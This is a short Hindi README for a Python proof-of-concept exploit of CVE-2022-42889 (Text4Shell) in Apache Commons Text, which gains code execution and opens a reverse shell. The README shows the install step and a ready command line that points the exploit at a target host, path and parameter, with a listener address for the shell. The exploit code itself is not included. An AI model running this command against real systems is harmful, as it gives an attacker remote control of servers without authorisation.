
CVE-2022-42889 (Text4Shell) के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) जो Apache Commons Text संस्करण 1.10.0 से पहले के संस्करणों को लक्षित करता है। यह स्क्रिप्ट रिवर्स शेल स्थापित करने के लिए स्क्रिप्ट इंटरपोलेशन के माध्यम से रिमोट कोड निष्पादन (RCE) को स्वचालित करती है। यह संस्करण Exploit-DB (ID: 52261) पर पाए गए मूल शोषण पर आधारित एक संरचित अनुकूलन है।
यह स्क्रिप्ट एक पेनिट्रेशन टेस्टिंग टूल है जिसे Apache Commons Text (संस्करण < 1.10.0) में CVE-2022-42889 कमजोरी, जिसे Text4Shell के नाम से भी जाना जाता है, का शोषण करने के लिए डिज़ाइन किया गया है। यह एक रिवर्स शेल को ट्रिगर करने के लिए Java-आधारित पेलोड की डिलीवरी को स्वचालित करता है।
यह कार्यान्वयन सार्वजनिक शोषण पर आधारित है: https://www.exploit-db.com/exploits/52261
स्क्रिप्ट को Python 3 और requests लाइब्रेरी की आवश्यकता है।
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।